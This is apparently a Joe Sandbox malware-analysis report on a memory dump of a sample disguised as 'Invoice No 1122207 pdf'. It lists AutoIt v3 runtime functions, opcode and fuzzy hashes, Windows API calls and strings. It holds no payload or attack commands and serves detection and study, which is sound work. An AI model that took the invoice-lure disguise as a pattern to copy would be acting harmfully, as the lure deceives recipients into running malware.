Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0968b6ffe64bf806d03d9ab60a54bc427789297fd9135d47466a2d5038968240
Instruction ID: 881136962dc75cc9bf3f34b6bc7bcc0ca3eb2d6e1765fa22485b7ef371f1c26b
Opcode Fuzzy Hash: 0968b6ffe64bf806d03d9ab60a54bc427789297fd9135d47466a2d5038968240
Instruction Fuzzy Hash: 8F323521D29F014EEB239635CD22336A64DAFB73C5F15D737E81AB5EA5EB68C4834104

Function 0042CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ca3e73ff07188aab83d9a94ca336fb4c74d74a551f28ffe4fe9bce99ff69fe
Instruction ID: c51d29c05a9ec3443fe24ba45c0e2700ca34eacb9bb1c584056eba32015b3e1f
Opcode Fuzzy Hash: 77ca3e73ff07188aab83d9a94ca336fb4c74d74a551f28ffe4fe9bce99ff69fe
Instruction Fuzzy Hash: 2A32E131B001558BDF28CE69D4D467E7BA1AF45300F68816BD4DA9B391F23C9E82DB4B

Function 00417920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbfe49044454c37d242fc3ab4f47fac493ffd7db157dee5d285fc0c83f96c396
Instruction ID: e79187e9489bcf6a0213a319a3d41cb664b3c4e337d71a61c055d85dfabdbe0e
Opcode Fuzzy Hash: fbfe49044454c37d242fc3ab4f47fac493ffd7db157dee5d285fc0c83f96c396
Instruction Fuzzy Hash: 7222F1B0A04609DFDF04CF65C991AFEB3B5FF48304F10412AE816A7291EB39AD55CB59

Function 004191C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f490dbf58c6019a6045dcc5a78443eb111d4797b7589f27cdc343ebee7cd46d
Instruction ID: c4ea14548b8f248bac80e692cb8833e04a3c248062f6c23e961347b75e32532f
Opcode Fuzzy Hash: 9f490dbf58c6019a6045dcc5a78443eb111d4797b7589f27cdc343ebee7cd46d
Instruction Fuzzy Hash: 0102F6B0E00109EBCB05DF65D981AAEB7B1FF44304F50816AE816DB391E739EE55CB89

Function 00431C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 88aa4d5110643c649ddbc04e2564b90e9b6b4898e293fa57585c52177d949e86
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: EF9198721080A34ADB29423E853503FFFE15E563B1B1A279FD4F2CA2E1FE18D954D624

Function 004319B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 22f1bcf4688c62c16413c403157820c39866a4f555445a4a06d86e54ad177b84
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: F291C6722090E30ADB2D427A847403FFFE14A963B2B1A279FD4F2CA2E1FD18D555D624

Function 00437A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665f1f512deed0926ffc35e1f86ea16cee1f24a7845e9de2f44113ac22bf4de6
Instruction ID: 0ab1eda3c4a2fc816106b00c2e7bdc9c09070e2be8bb8df06286ae26a1288aaa
Opcode Fuzzy Hash: 665f1f512deed0926ffc35e1f86ea16cee1f24a7845e9de2f44113ac22bf4de6
Instruction Fuzzy Hash: AC613AE120874956DA34AA2848957BFB3A4DF4D718F14391FF8C2DB382D61DAE42C35E

Function 00437CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e6a13024682c61d09378aabdfe7cc2aa841bb2a405dfad74ccdf5efd8af8506
Instruction ID: b2a439f55ce16124dc78880318638c415f119d223588e3b7d968c0c4349d371b
Opcode Fuzzy Hash: 9e6a13024682c61d09378aabdfe7cc2aa841bb2a405dfad74ccdf5efd8af8506
Instruction Fuzzy Hash: E1616BF120870966DE385A289892BBF63949F4D744F20395FF9C3DB381D61E9D42825E

Function 00431706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 769b7f0385c46742cd252e659e0394e639662515a03f0afdc5151e829fa24050
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 0F8196725080A309DB2D423A857443FFFE15E963A1B1E179FD4F2CA2E1EE18C554D628

Function 004A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 004A712F
GetSysColorBrush.USER32(0000000F), ref: 004A7160
GetSysColor.USER32(0000000F), ref: 004A716C
SetBkColor.GDI32(?,000000FF), ref: 004A7186
SelectObject.GDI32(?,?), ref: 004A7195
InflateRect.USER32(?,000000FF,000000FF), ref: 004A71C0
GetSysColor.USER32(00000010), ref: 004A71C8
CreateSolidBrush.GDI32(00000000), ref: 004A71CF
FrameRect.USER32(?,?,00000000), ref: 004A71DE
DeleteObject.GDI32(00000000), ref: 004A71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 004A7230
FillRect.USER32(?,?,?), ref: 004A7262
GetWindowLongW.USER32(?,000000F0), ref: 004A7284

Part of subcall function 004A73E8: GetSysColor.USER32(00000012), ref: 004A7421
Part of subcall function 004A73E8: SetTextColor.GDI32(?,?), ref: 004A7425
Part of subcall function 004A73E8: GetSysColorBrush.USER32(0000000F), ref: 004A743B
Part of subcall function 004A73E8: GetSysColor.USER32(0000000F), ref: 004A7446
Part of subcall function 004A73E8: GetSysColor.USER32(00000011), ref: 004A7463
Part of subcall function 004A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004A7471
Part of subcall function 004A73E8: SelectObject.GDI32(?,00000000), ref: 004A7482
Part of subcall function 004A73E8: SetBkColor.GDI32(?,00000000), ref: 004A748B
Part of subcall function 004A73E8: SelectObject.GDI32(?,?), ref: 004A7498
Part of subcall function 004A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004A74B7
Part of subcall function 004A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004A74CE
Part of subcall function 004A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004A74DB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: bc6962324c111447c5655f872f0de6a3d2b6b591feac46a8c80848d963cdcfca
Instruction ID: f9750ebc21ed2f779264fe058ba64ec8d91ebe6f7ce6eb81098d1e806a156fdc
Opcode Fuzzy Hash: bc6962324c111447c5655f872f0de6a3d2b6b591feac46a8c80848d963cdcfca
Instruction Fuzzy Hash: 21A1B072508311BFDB509F60DC88A6B7BE9FF4A320F100A29F962961E1D734E945CF56

Function 00428D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00428E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00466AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00466AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00466F43

Part of subcall function 00428F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00428BE8,?,00000000,?,?,?,?,00428BBA,00000000,?), ref: 00428FC5

SendMessageW.USER32(?,00001053), ref: 00466F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00466F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00466FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00466FB7

Strings

0, xrefs: 00466DCF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 0ae642a49dc10cab2eb136b1e90c390d6a728b744337930b170b8338b7df97e8
Instruction ID: e85ca2b2c90c6feb97eea3cbf86d1acb8bcee936fe23978b98dc5e39ab1ebc98
Opcode Fuzzy Hash: 0ae642a49dc10cab2eb136b1e90c390d6a728b744337930b170b8338b7df97e8
Instruction Fuzzy Hash: 2312AD30201261EFD725CF14D884BAABBE5FB45300F56446EF485CB262DB39AC52CF9A

Function 00492711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0049273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0049286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004928B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00492900
GetClientRect.USER32(00000000,?), ref: 0049290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00492955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00492964
GetStockObject.GDI32(00000011), ref: 00492974
SelectObject.GDI32(00000000,00000000), ref: 00492978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00492988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00492991
DeleteDC.GDI32(00000000), ref: 0049299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 004929DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00492A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00492A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00492A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00492A77
GetStockObject.GDI32(00000011), ref: 00492A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00492A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00492A97

Strings

DISPLAY, xrefs: 0049295A
static, xrefs: 0049294F, 00492A71
AutoIt v3, xrefs: 004928F8
msctls_progress32, xrefs: 00492A13

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: f02e6e03209e82f10c4dcfa8a99c1eccd857aca8c649c6cbd17841e4bc6b8f98
Instruction ID: ac55f365a4a78227d321ccebc7043afebb5a7eabf6cfe2735ba8c94126c14207
Opcode Fuzzy Hash: f02e6e03209e82f10c4dcfa8a99c1eccd857aca8c649c6cbd17841e4bc6b8f98
Instruction Fuzzy Hash: BFB16D71A40215BFEB14DFA8CD85FAF7BA9EB05714F004129F914EB2A1D774AD40CBA8

Function 00484ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00484AED
GetDriveTypeW.KERNEL32(?,004ACB68,?,\\.\,004ACC08), ref: 00484BCA
SetErrorMode.KERNEL32(00000000,004ACB68,?,\\.\,004ACC08), ref: 00484D36

Strings

SSD, xrefs: 00484C4A
CDROM, xrefs: 00484BFB
1394, xrefs: 00484C9F
Network, xrefs: 00484C02
iSCSI, xrefs: 00484CC2
RAID, xrefs: 00484CBB
Unknown, xrefs: 00484BED, 00484C83
MMC, xrefs: 00484CDE
SCSI, xrefs: 00484C8A
Fixed, xrefs: 00484C09
RAMDisk, xrefs: 00484BF4
SAS, xrefs: 00484CC9
ATA, xrefs: 00484C98
\\.\, xrefs: 00484B3F
SATA, xrefs: 00484CD0
Removable, xrefs: 00484C10, 00484C15
Fibre, xrefs: 00484CAD
SSA, xrefs: 00484CA6
FileBackedVirtual, xrefs: 00484CEC
Virtual, xrefs: 00484CE5
ATAPI, xrefs: 00484C91
PhysicalDrive, xrefs: 00484B76
USB, xrefs: 00484CB4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: fa19ddcda06f0026cdb65df75310f9aed03ba477e4acb6d444f4603689308ce5
Instruction ID: 427a2dd218af584eb15e7a214791de95c45331cfc946f5d6ba2a1a272927d42f
Opcode Fuzzy Hash: fa19ddcda06f0026cdb65df75310f9aed03ba477e4acb6d444f4603689308ce5
Instruction Fuzzy Hash: 8161C2307011079BCB04FF24C991AADB7A5AB84744B22881BF806AB751DB7DED42DB5E

Function 004A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 004A7421
SetTextColor.GDI32(?,?), ref: 004A7425
GetSysColorBrush.USER32(0000000F), ref: 004A743B
GetSysColor.USER32(0000000F), ref: 004A7446
CreateSolidBrush.GDI32(?), ref: 004A744B
GetSysColor.USER32(00000011), ref: 004A7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 004A7471
SelectObject.GDI32(?,00000000), ref: 004A7482
SetBkColor.GDI32(?,00000000), ref: 004A748B
SelectObject.GDI32(?,?), ref: 004A7498
InflateRect.USER32(?,000000FF,000000FF), ref: 004A74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004A74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 004A74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004A752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004A7554
InflateRect.USER32(?,000000FD,000000FD), ref: 004A7572
DrawFocusRect.USER32(?,?), ref: 004A757D
GetSysColor.USER32(00000011), ref: 004A758E
SetTextColor.GDI32(?,00000000), ref: 004A7596
DrawTextW.USER32(?,004A70F5,000000FF,?,00000000), ref: 004A75A8
SelectObject.GDI32(?,?), ref: 004A75BF
DeleteObject.GDI32(?), ref: 004A75CA
SelectObject.GDI32(?,?), ref: 004A75D0
DeleteObject.GDI32(?), ref: 004A75D5
SetTextColor.GDI32(?,?), ref: 004A75DB
SetBkColor.GDI32(?,?), ref: 004A75E5

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2bfb8be49074dcb757b7e8e94cc5a2b0a71b483fbbfe4f4492fcf283adbd77f1
Instruction ID: 08a8fdc4e1a997d8656ee657d41150064e53ff0c03ac1a4196fc342feacf585f
Opcode Fuzzy Hash: 2bfb8be49074dcb757b7e8e94cc5a2b0a71b483fbbfe4f4492fcf283adbd77f1
Instruction Fuzzy Hash: 41615F72D04218BFDF119FA4DC89AAE7FB9EB0A320F114125F915AB2A1D7749940CF94

Function 004A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004A1128
GetDesktopWindow.USER32 ref: 004A113D
GetWindowRect.USER32(00000000), ref: 004A1144
GetWindowLongW.USER32(?,000000F0), ref: 004A1199
DestroyWindow.USER32(?), ref: 004A11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004A11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004A120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004A121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 004A1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 004A1245
IsWindowVisible.USER32(00000000), ref: 004A12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004A12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004A12D0
GetWindowRect.USER32(00000000,?), ref: 004A12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 004A130E
GetMonitorInfoW.USER32(00000000,?), ref: 004A1328
CopyRect.USER32(?,?), ref: 004A133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 004A13AA

Strings

tooltips_class32, xrefs: 004A11E6
(, xrefs: 004A131B
0, xrefs: 004A10D3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 22dc715e092b7db86997d443cd8f30914446447dd2da8694ece98b2402bc7719
Instruction ID: 0ffc2c64c37b8490d36b32f9974f36d28d8c94be82043d8f3acc072a01946b38
Opcode Fuzzy Hash: 22dc715e092b7db86997d443cd8f30914446447dd2da8694ece98b2402bc7719
Instruction Fuzzy Hash: 94B1AE71608340AFD700DF65C884BABBBE4FF99354F00891EF9999B261C735E845CB99

Function 004A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004A02E5
_wcslen.LIBCMT ref: 004A031F
_wcslen.LIBCMT ref: 004A0389
_wcslen.LIBCMT ref: 004A03F1
_wcslen.LIBCMT ref: 004A0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004A04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004A0504

Part of subcall function 0042F9F2: _wcslen.LIBCMT ref: 0042F9FD

Part of subcall function 0047223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00472258
Part of subcall function 0047223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0047228A

Strings

SELECTINVERT, xrefs: 004A057E
